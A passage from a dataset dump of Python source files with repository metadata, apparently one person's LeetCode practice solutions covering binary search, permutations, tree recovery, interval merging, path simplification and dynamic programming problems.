"text": "#coding: utf-8\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be inserted\n # @return integer\n def searchInsert(self, A, target):\n '''\n Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 → 2\n[1,3,5,6], 2 → 1\n[1,3,5,6], 7 → 4\n[1,3,5,6], 0 → 0 \n '''\n if len(A) == 0:\n return -1\n if target <= A[0]:\n return 0\n l = 0\n r = len(A) - 1\n while l <= r:\n mid = (l + r) // 2\n if A[mid] == target:\n if mid > 0 and A[mid - 1] == target:\n r = mid - 1\n else:\n return mid\n elif A[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n return l"
},
{
"alpha_fraction": 0.5634218454360962,
"alphanum_fraction": 0.5860373377799988,
"avg_line_length": 32.93333435058594,
"blob_id": "a82d415d2f19322e8f38e247f02a1a4831a35afc",
"content_id": "5d055046e242ac90e05b9e17db65f1fc66442df2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 30,
"path": "/Letter Combinations of a Phone Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of strings, [s1, s2]\n def letterCombinations(self, digits):\n '''\n Given a digit string, return all possible letter combinations that the number could represent.\n\nA mapping of digit to letters (just like on the telephone buttons) is given below.\n\nInput:Digit string \"23\"\nOutput: [\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\n\nNote:\nAlthough the above answer is in lexicographical order, your answer could be in any order you want. \n '''\n dig2charDic = {'2': \"abc\", '3': \"def\", '4': \"ghi\", '5': \"jkl\", '6': \"mno\", '7': \"pqrs\", '8': \"tuv\", '9': \"wxyz\"}\n res = []\n self.dfs(digits, \"\", dig2charDic, res)\n return res\n\n def dfs(self, digits, chars, dig2charDic, res):\n if digits == \"\":\n res.append(chars)\n return\n for c in dig2charDic[digits[0]]:\n self.dfs(digits[1:], chars + c, dig2charDic, res)\n\nd0 = \"23\"\nd = d0\nprint(d)\nprint(Solution.letterCombinations(Solution(), d))"
},
{
"alpha_fraction": 0.38950276374816895,
"alphanum_fraction": 0.4019336998462677,
"avg_line_length": 23.965517044067383,
"blob_id": "216c415380546169d2341862f01c792f8c2b02f8",
"content_id": "f6f4b0ad59df12ad556b1728a6c7696ac47abb6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 724,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 29,
"path": "/Divide Two Integers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def divide(self, dividend, divisor):\n '''\n Divide two integers without using multiplication, division and mod operator. \n '''\n x, y = dividend, divisor\n sign = 1\n if x < 0:\n x *= -1\n sign *= -1\n if y < 0:\n y *= -1\n sign *= -1\n c, x = self.help(x, y)\n while x >= y:\n r, x = self.help(x, y)\n c += r\n return c * sign\n \n def help(self, a, b):\n if a < b:\n return [0, a]\n counter = 1\n t = b\n while a >= t + t:\n t = t + t\n counter = counter + counter\n return [counter, a - t]\n"
},
{
"alpha_fraction": 0.45448505878448486,
"alphanum_fraction": 0.4903654456138611,
"avg_line_length": 25.89285659790039,
"blob_id": "f6e358ff749fc2a102798b5a057648d5d627ea08",
"content_id": "2c483bcdb8714ba9556909502d0e15871ece3cd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1511,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 56,
"path": "/Next Permutation.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @param num, a list of integer\n # @return a list of integer\n def nextPermutation(self, num):\n '''\n Implement next permutation, which rearranges numbers into the lexicographically next greater permutation of numbers.\n\nIf such arrangement is not possible, it must rearrange it as the lowest possible order (ie, sorted in ascending order).\n\nThe replacement must be in-place, do not allocate extra memory.\n\nHere are some examples. Inputs are in the left-hand column and its corresponding outputs are in the right-hand column.\n1,2,3 → 1,3,2\n3,2,1 → 1,2,3\n1,1,5 → 1,5,1\n '''\n n = len(num)\n x = -1\n for i in range(n - 1, 0, -1):\n if num[i - 1] < num[i]:\n x = i - 1\n break\n if x == -1:\n self.reverse(num)\n return num\n y = x + 1\n for j in range(x + 1, n):\n if num[x] >= num[j]:\n y = j - 1\n break\n if num[x] < num[n - 1]:\n y = n - 1\n t = num[x]\n num[x] = num[y]\n num[y] = t\n num[x + 1:] = self.reverse(num[x + 1:])\n return num\n\n def reverse(self, a):\n l = 0\n r = len(a) - 1\n while l < r:\n t = a[l]\n a[l] = a[r]\n a[r] = t\n l += 1\n r -= 1\n return a\n\ns0 = [1]\ns1 = [1, 3, 2]\ns2 = [2,2,7,5,4,3,2,2,1]\ns = s2\nprint(len(s), s)\nprint(Solution.nextPermutation(Solution(), s))"
},
{
"alpha_fraction": 0.5149583220481873,
"alphanum_fraction": 0.5203531384468079,
"avg_line_length": 25.842105865478516,
"blob_id": "172f5cb1a81b13d7fbc755226da73a11e899f5a5",
"content_id": "8645cbc012a58a9e8daf1e4ec46019db2ec6eac6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2039,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 76,
"path": "/Recover Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # @param root, a tree node\n # @return a tree node\n def recoverTree(self, root):\n ''' Two elements of a binary search tree (BST) are swapped by mistake.\n\nRecover the tree without changing its structure.\nNote:\nA solution using O(n) space is pretty straight forward. Could you devise a constant space solution?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n errlist = []\n self.validBST(root, None, None, errlist)\n if len(errlist) == 0:\n return root\n minn = errlist[0][0]\n maxn = errlist[0][0]\n for item in errlist:\n for x in item:\n if x.val > maxn.val:\n maxn = x\n if x.val < minn.val:\n minn = x\n t = minn.val\n minn.val = maxn.val\n maxn.val = t\n return root\n\n def validBST(self, node, l, r, errlist):\n if node is None:\n return True\n if l and node.val <= l.val:\n errlist.append([l, node])\n if r and node.val >= r.val:\n errlist.append([r, node])\n self.validBST(node.left, l, node, errlist)\n self.validBST(node.right, node, r, errlist)\n\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def show(self):\n if self is None:\n return\n print(self.val, end=\" \")\n if self.left or self.right:\n if self.left:\n self.left.show()\n else:\n print(\"#\", end=\" \")\n if self.right:\n self.right.show()\n else:\n print(\"#\", end=\" \")\n\na = TreeNode(2)\nb = TreeNode(3)\nc = TreeNode(1)\na.right = b\nb.left = c\ns = Solution()\nx = s.recoverTree(a)\nx.show()\nprint()"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6255060434341431,
"avg_line_length": 28.117647171020508,
"blob_id": "2ffca39cfe1bfb76f5a3a11c8f4e4f50518bf791",
"content_id": "4aeff29c6311511148b8cd522ce384e97cb56848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 494,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 17,
"path": "/Single Number.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integer\n # @return an integer\n def singleNumber(self, A):\n '''Given an array of integers, every element appears twice except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. Could you implement it without using extra memory? '''\n res = 0\n for a in A:\n res = res ^ a\n return res\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4]\nso = Solution()\nres = so.singleNumber(A)\nprint(res)"
},
{
"alpha_fraction": 0.40365681052207947,
"alphanum_fraction": 0.4331927001476288,
"avg_line_length": 24.428571701049805,
"blob_id": "a1c071fe62d225da8b5979aeb63da88e70600631",
"content_id": "c9ebff6afac86a462fdd24da18af5c25ce176994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 711,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 28,
"path": "/Remove Duplicates from Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @return an integer\n def removeDuplicates(self, A):\n '''\n Follow up for \"Remove Duplicates\":\nWhat if duplicates are allowed at most twice?\n\nFor example,\nGiven sorted array A = [1,1,1,2,2,3],\n\nYour function should return length = 5, and A is now [1,1,2,2,3]. \n '''\n if len(A) <= 1:\n return len(A)\n count = 1\n i = 1\n while i < len(A):\n if A[i] == A[i - 1]:\n count += 1\n if count > 2:\n del A[i]\n continue\n i += 1\n else:\n count = 1\n i += 1\n return len(A)"
},
{
"alpha_fraction": 0.4674573242664337,
"alphanum_fraction": 0.4900202453136444,
"avg_line_length": 30.153152465820312,
"blob_id": "443bd32e875f1285d7014d9a14d2b77147809809",
"content_id": "00a51495c30b42a20bb1af210d6e5e206f75362e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3457,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 111,
"path": "/Merge Intervals.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n # @param intervals, a list of Interval\n # @return a list of Interval\n def merge(self, intervals):\n '''\n Given a collection of intervals, merge all overlapping intervals.\n\nFor example,\nGiven [1,3],[2,6],[8,10],[15,18],\nreturn [1,6],[8,10],[15,18]. \n '''\n if len(intervals) == 0:\n return []\n return self.solution_sort(intervals)\n #return self.solution_discrete(intervals)\n\n #388ms\n def solution_sort(self, intervals):\n def intervalCmp(x, y):\n return cmp(x.start, y.start)\n intervals.sort(cmp=intervalCmp)\n l, r = intervals[0].start, intervals[0].end\n ans = []\n for i in range(1, len(intervals)):\n if intervals[i].start <= r:\n r = max(r, intervals[i].end)\n else:\n ans.append(Interval(l, r))\n l, r = intervals[i].start, intervals[i].end\n ans.append(Interval(l, r))\n return ans\n\n #364ms\n def solution_discrete(self, intervals):\n allValues = []\n for iv in intervals:\n allValues.append(iv.start)\n allValues.append(iv.end)\n allValues.sort()\n valueIndexMap = {}\n indexValueList = []\n k = -1\n for i in range(len(allValues)):\n if i > 0 and allValues[i] == allValues[i - 1]:\n continue\n elif i > 0 and allValues[i] > allValues[i - 1] + 1:\n k += 1\n valueIndexMap[allValues[i - 1] + 1] = k\n indexValueList.append(allValues[i - 1] + 1)\n k += 1\n valueIndexMap[allValues[i]] = k\n indexValueList.append(allValues[i])\n #print(allValues)\n #print(indexValueList)\n #print(valueIndexMap)\n indexIntervals = []\n for iv in intervals:\n indexIntervals.append(Interval(valueIndexMap[iv.start], valueIndexMap[iv.end]))\n\n def solution_array(indexIntervals, n):\n cover = [0] * n\n for iv in indexIntervals:\n cover[iv.start] = max(cover[iv.start], iv.end - iv.start + 1)\n ans = []\n l, r = 0, 0\n while True:\n while l < n and cover[l] == 0:\n l += 1\n if l == n:\n break\n r = l\n lens = cover[l] -1\n while lens > 0:\n r += 1\n lens -= 1\n if r < n:\n lens = max(lens, cover[r] - 1)\n ans.append(Interval(l, r))\n l = r + 1\n return ans\n indexAns = solution_array(indexIntervals, len(indexValueList))\n ans = []\n for indexIv in indexAns:\n ans.append(Interval(indexValueList[indexIv.start], indexValueList[indexIv.end]))\n return ans\n\nclass Interval:\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n def __str__(self):\n return \"[\" + str(self.start) + \", \" + str(self.end) + \"]; \"\n\n\ns1 = [[1,3], [6,7], [2, 4]]\ns2 = [[1,4], [5,6]]\ns3 = [[1,4],[0,0]]\nss = s3\ns = []\nfor iv in ss:\n s.append(Interval(iv[0], iv[1]))\nprint(''.join([str(i) for i in s]))\nans = Solution.merge(Solution(), s)\nif ans:\n print(''.join([str(i) for i in ans]))"
},
{
"alpha_fraction": 0.4941069781780243,
"alphanum_fraction": 0.49954667687416077,
"avg_line_length": 26.600000381469727,
"blob_id": "d5a0dc81771305186202303ba92f36b60a9b7f4a",
"content_id": "7e36a35446a012c002f601bb57cafc178b2063f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/Simplify Path.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param path, a string\n # @return a string\n def simplifyPath(self, path):\n '''\n Given an absolute path for a file (Unix-style), simplify it.\n\nFor example,\npath = \"/home/\", => \"/home\"\npath = \"/a/./b/../../c/\", => \"/c\"\n\nclick to show corner cases.\nCorner Cases:\n\n Did you consider the case where path = \"/../\"?\n In this case, you should return \"/\".\n Another corner case is the path might contain multiple slashes '/' together, such as \"/home//foo/\".\n In this case, you should ignore redundant slashes and return \"/home/foo\".\n '''\n names = path.split('/')\n stack = []\n for name in names:\n if name == '.' or name == '':\n continue\n elif name == '..':\n if len(stack) == 0:\n continue\n else:\n stack.pop()\n else:\n stack.append(name)\n return '/' + '/'.join(stack)\n\np1 = '/.././'\np2 = \"/home/\"\np3 = \"/a/./b/../../c/\"\np4 = \"/home//foo/\"\np = p4\nprint(p)\nprint(Solution.simplifyPath(Solution(), p))"
},
{
"alpha_fraction": 0.38420742750167847,
"alphanum_fraction": 0.40601059794425964,
"avg_line_length": 25.123077392578125,
"blob_id": "73cfa3ebb77385ff25ed228e7ed6cd157fc5d897",
"content_id": "1a4872b9e47371ca716a9e13360fbb3ce0f3099f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1697,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 65,
"path": "/Search in Rotated Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n '''\n Suppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nYou are given a target value to search. If found in the array return its index, otherwise return -1.\n\nYou may assume no duplicate exists in the array.\n '''\n #return self.directBS(A, target)\n return self.povitFirstBS(A, target)\n\n def directBS(self, A, target):\n l = 0\n r = len(A) - 1\n while l < r:\n mid = (l + r) // 2\n if A[mid] >= A[l]:\n if A[l] <= target <= A[mid]:\n r = mid\n else:\n l = mid + 1\n else:\n if A[mid] <= target <= A[r]:\n l = mid\n else:\n r = mid - 1\n if A[l] != target:\n l = -1\n return l\n\n def povitFirstBS(self, A, x):\n n = len(A)\n l = 0\n r = len(A) - 1\n while l < r:\n mid = (l + r) // 2\n if A[mid] > A[r]:\n l = mid + 1\n else:\n r = mid\n povit = l\n l = 0\n r = n - 1\n while l < r:\n mid = (l + r) // 2\n rmid = (mid + povit) % n\n if A[rmid] >= x:\n r = mid\n else:\n l = mid + 1\n res = (l + povit) % n\n if A[res] != x:\n res = -1\n return res\n\ns0 = [[3, 1], 1]\ns = s0\nprint(s)\nprint(Solution.search(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.38847583532333374,
"alphanum_fraction": 0.4479553997516632,
"avg_line_length": 28.91666603088379,
"blob_id": "b0bdf3e0830c991c27e9ea9b04c553fc0219e262",
"content_id": "b58e4e860f0d5d71e8434d7578e201a7352f7eb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 36,
"path": "/Interleaving String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isInterleave(self, s1, s2, s3):\n ''' Given s1, s2, s3, find whether s3 is formed by the interleaving of s1 and s2.\n\nFor example,\nGiven:\ns1 = \"aabcc\",\ns2 = \"dbbca\",\n\nWhen s3 = \"aadbbcbcac\", return true.\nWhen s3 = \"aadbbbaccc\", return false. '''\n l1 = len(s1)\n l2 = len(s2)\n l3 = len(s3)\n if l1 + l2 != l3:\n return False\n f = [[False] * (l2 + 1) for row in range(l1 + 1)]\n f[0][0] = True\n for i in range(1, l1 + 1):\n if s1[:i] == s3[:i]:\n f[i][0] = True\n for i in range(1, l2 + 1):\n if s2[:i] == s3[:i]:\n f[0][i] = True\n for i in range(1, l1 + 1):\n for j in range(1, l2 + 1):\n f[i][j] = (f[i - 1][j] and s1[i - 1] == s3[i + j - 1]) or \\\n (f[i][j - 1] and s2[j - 1] == s3[i + j - 1])\n return f[l1][l2]\n\ns0 = [\"aabcc\", \"dbbca\", \"aadbbcbcac\"]\ns1 = [\"aabcc\", \"dbbca\", \"aadbbbaccc\"]\na = s1\ns = Solution()\nprint(s.isInterleave(a[0], a[1], a[2]))"
},
{
"alpha_fraction": 0.5802919864654541,
"alphanum_fraction": 0.6049270033836365,
"avg_line_length": 24.488372802734375,
"blob_id": "f0163d60ae40f6741397c18e0ccf926bd9dc009a",
"content_id": "7c5ebea9d67cbfda86d11751dd0836fadf3179f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 43,
"path": "/Symmetric Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isSymmetric(self, root):\n '''Given a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).\n\nFor example, this binary tree is symmetric:\n\n 1\n / \\\n 2 2\n / \\ / \\\n3 4 4 3\n\nBut the following is not:\n\n 1\n / \\\n 2 2\n \\ \\\n 3 3\n\nNote:\nBonus points if you could solve it both recursively and iteratively.\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n if root is None:\n return True\n return self.symmetric(root.left, root.right)\n\n def symmetric(self, node1, node2):\n if node1 is None and node2 is None:\n return True\n if node1 is None or node2 is None:\n return False\n return node1.val == node2.val and self.symmetric(node1.left, node2.right) and self.symmetric(node1.right, node2.left)\n"
},
{
"alpha_fraction": 0.434815376996994,
"alphanum_fraction": 0.45742276310920715,
"avg_line_length": 32.17499923706055,
"blob_id": "a3a165560fc76d0e752852827f283f1aeb84ee43",
"content_id": "2ba3c36df4e58e6819de6da5eb8e369ca122e518",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 40,
"path": "/Set Matrix Zeroes.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n '''\n Given a m x n matrix, if an element is 0, set its entire row and column to 0. Do it in place.\n\nclick to show follow up.\nFollow up:\n\nDid you use extra space?\nA straight forward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n '''\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n row1zero = 1\n col1zero = 1\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n if i * j == 0:\n if i == 0:\n row1zero = 0\n if j == 0:\n col1zero = 0\n else:\n matrix[0][j] = 0\n matrix[i][0] = 0\n for i in range(1, m):\n for j in range(1, n):\n if matrix[0][j] * matrix[i][0] == 0:\n matrix[i][j] = 0\n for i in range(n):\n matrix[0][i] *= row1zero\n for i in range(m):\n matrix[i][0] *= col1zero\n"
},
{
"alpha_fraction": 0.530019998550415,
"alphanum_fraction": 0.54202800989151,
"avg_line_length": 34.7023811340332,
"blob_id": "049eca0784056f065fa63fd5fad1179c2f7c61e5",
"content_id": "1b186c14f7f7ee97c70d831c3c9be35e97aeee5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2998,
"license_type": "no_license",
"max_line_length": 234,
"num_lines": 84,
"path": "/Substring with Concatenation of All Words.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n def findSubstring(self, S, L):\n return self.findSubstring_usingDic(S, L)\n\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n # using dictionary 1700ms, O(len(S) * len(L))\n def findSubstring_usingDic(self, S, L):\n '''\n You are given a string, S, and a list of words, L, that are all of the same length. Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\nFor example, given:\nS: \"barfoothefoobarman\"\nL: [\"foo\", \"bar\"]\n\nYou should return the indices: [0,9].\n(order does not matter). \n '''\n n = len(L)\n if n == 0:\n return []\n word_len = len(L[0])\n allWordsDic = {}\n for s in L:\n if s not in allWordsDic:\n allWordsDic[s] = 1\n else:\n allWordsDic[s] += 1\n res = []\n for i in range(len(S) - n * word_len + 1):\n t_dic = allWordsDic.copy()\n flag = True\n for j in range(i, i + n * word_len, word_len):\n if S[j:j+word_len] not in t_dic:\n flag = False\n break\n t_dic[S[j:j+word_len]] -= 1\n if t_dic[S[j:j+word_len]] == 0:\n del t_dic[S[j:j+word_len]]\n if flag:\n res.append(i)\n return res\n\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n # using dictionary 1700ms, O(len(S)), but can not pass the OJ because of the false positive\n def findSubstring_usingHash(self, S, L):\n '''\n You are given a string, S, and a list of words, L, that are all of the same length. Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\nFor example, given:\nS: \"barfoothefoobarman\"\nL: [\"foo\", \"bar\"]\n\nYou should return the indices: [0,9].\n(order does not matter).\n '''\n n = len(L)\n if n == 0:\n return []\n word_len = len(L[0])\n hashsum = sum([hash(s) for s in L])\n res = []\n hs = [0] * (len(S) + 1)\n for i in range(word_len, len(S) + 1):\n hs[i] += hs[i - word_len] + hash(S[i - word_len:i])\n print(S[i - word_len:i], hash(S[i - word_len:i]))\n return [i - n * word_len for i in range(n * word_len, len(S) + 1) \\\n if hs[i] - hs[i - n * word_len] == hashsum]\n\ns2 = ['a', ['a']]\ns0 = [\"barfoothefoobarman\", [\"foo\",\"bar\"]]\ns1 = [\"lingmindraboofooowingdingbarrwingmonkeypoundcake\", [\"fooo\",\"barr\",\"wing\",\"ding\",\"wing\"]]\ns3 = [\"abbbbbacbc\", [\"bc\",\"ac\"]]\ns = s3\nprint(s)\nprint(len(s[0]), len(s[1]))\nprint(Solution.findSubstring_usingDic(Solution(), s[0], s[1]))\nprint(Solution.findSubstring_usingHash(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.5360824465751648,
"alphanum_fraction": 0.5715922117233276,
"avg_line_length": 27.19354820251465,
"blob_id": "9be5a6161eda1a8676e727a5ef9be9d2ed7db2d9",
"content_id": "810bf17f9867930bebd057d4126f94ca2496308e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 31,
"path": "/Maximum Subarray.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @param A, a list of integers\n # @return an integer\n def maxSubArray(self, A):\n '''\n Find the contiguous subarray within an array (containing at least one number) which has the largest sum.\n\nFor example, given the array [−2,1,−3,4,−1,2,1,−5,4],\nthe contiguous subarray [4,−1,2,1] has the largest sum = 6.\n\nclick to show more practice.\nMore practice:\n\nIf you have figured out the O(n) solution, try coding another solution using the divide and conquer approach, which is more subtle.\n '''\n n = len(A)\n if n == 0:\n return 0\n m = A[0]\n sum = 0\n for i in range(n):\n sum += A[i]\n m = max(m, sum)\n sum = max(sum, 0)\n return m\n\na1 = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\na = a1\nprint(len(a), a)\nprint(Solution.maxSubArray(Solution(), a))"
},
{
"alpha_fraction": 0.4793388545513153,
"alphanum_fraction": 0.4958677589893341,
"avg_line_length": 30.842105865478516,
"blob_id": "6181459431011651762b20cfea520f9d63de1ba9",
"content_id": "ca6a4c3770a6d054afa1d14072c14b951f04ac81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/Longest Common Prefix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def longestCommonPrefix(self, strs):\n '''\n Write a function to find the longest common prefix string amongst an array of strings. \n '''\n if len(strs) == 0:\n return \"\"\n if len(strs) == 1:\n return strs[0]\n lens = 0\n maxlen = len(strs[0])\n for str in strs:\n maxlen = min(maxlen, len(str))\n for lens in range(maxlen):\n for str in strs:\n if str[lens] != strs[0][lens]:\n return strs[0][0:lens]\n return strs[0][0:maxlen]\n"
},
{
"alpha_fraction": 0.5363724827766418,
"alphanum_fraction": 0.5441319346427917,
"avg_line_length": 34.55172348022461,
"blob_id": "73cd95d0f8ef3f9a24479f1446c32792959a0701",
"content_id": "0cb5fa49c93610f4d20335bf71122566ca3c93e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 29,
"path": "/Minimum Depth of Binary Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def minDepth(self, root):\n '''Given a binary tree, find its minimum depth.\n\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.'''\n if root is None:\n return 0\n if root.left is None and root.right is None:\n return 1\n queue = [[root, 1]]\n while len(queue):\n node, depth = queue.pop(0)\n if node.left:\n if node.left.left is None and node.left.right is None:\n return depth + 1\n queue.append([node.left, depth + 1])\n if node.right:\n if node.right.left is None and node.right.right is None:\n return depth + 1\n queue.append([node.right, depth + 1])\n"
},
{
"alpha_fraction": 0.4007253050804138,
"alphanum_fraction": 0.4487760663032532,
"avg_line_length": 27.710525512695312,
"blob_id": "7c3a31105cf7ff0f124ce84d517c83e1c64a9e02",
"content_id": "e4731f47bae673deb152db4c29c17b67fa94384c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 38,
"path": "/Add Two Numbers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @return a ListNode\n def addTwoNumbers(self, l1, l2):\n '''\n You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.\n\nInput: (2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 0 -> 8\n '''\n t1 = l1\n t2 = l2\n ex = 0\n l3 = ListNode(0)\n t3 = l3\n while t1 or t2:\n if t1 is None:\n n1 = 0\n else:\n n1 = t1.val\n t1 = t1.next\n if t2 is None:\n n2 = 0\n else:\n n2 = t2.val\n t2 = t2.next\n t3.next = ListNode((n1 + n2 + ex) % 10)\n ex = (n1 + n2 + ex) // 10\n t3 = t3.next\n if ex == 1:\n t3.next = ListNode(1)\n t3 = t3.next\n return l3.next\n "
},
{
"alpha_fraction": 0.46759259700775146,
"alphanum_fraction": 0.49537035822868347,
"avg_line_length": 36.565216064453125,
"blob_id": "9f8931b05c0ca6da0a82aea73059d6f1ca2101c7",
"content_id": "1e5481d3e86947c1e6ecd6a08d12fa6b8069956d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 23,
"path": "/Minimum Path Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param grid, a list of lists of integers\n # @return an integer\n def minPathSum(self, grid):\n '''\n Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.\n\nNote: You can only move either down or right at any point in time.\n '''\n if len(grid) == 0:\n return 0\n m = len(grid)\n n = len(grid[0])\n dp = [[0] * n for row in range(m)]\n dp[0][0] = grid[0][0]\n for i in range(1, m):\n dp[i][0] = grid[i][0] + dp[i - 1][0]\n for i in range(1, n):\n dp[0][i] = grid[0][i] + dp[0][i - 1]\n for i in range(1, m):\n for j in range(1, n):\n dp[i][j] = grid[i][j] + min(dp[i - 1][j], dp[i][j - 1])\n return dp[m - 1][n - 1]\n"
},
{
"alpha_fraction": 0.48560816049575806,
"alphanum_fraction": 0.5116063356399536,
"avg_line_length": 25.924999237060547,
"blob_id": "530542d27e86f5f7b127756aea5ca5aebb504373",
"content_id": "dff6484270bce2cee20790e3b7f7e6be8b95f981",
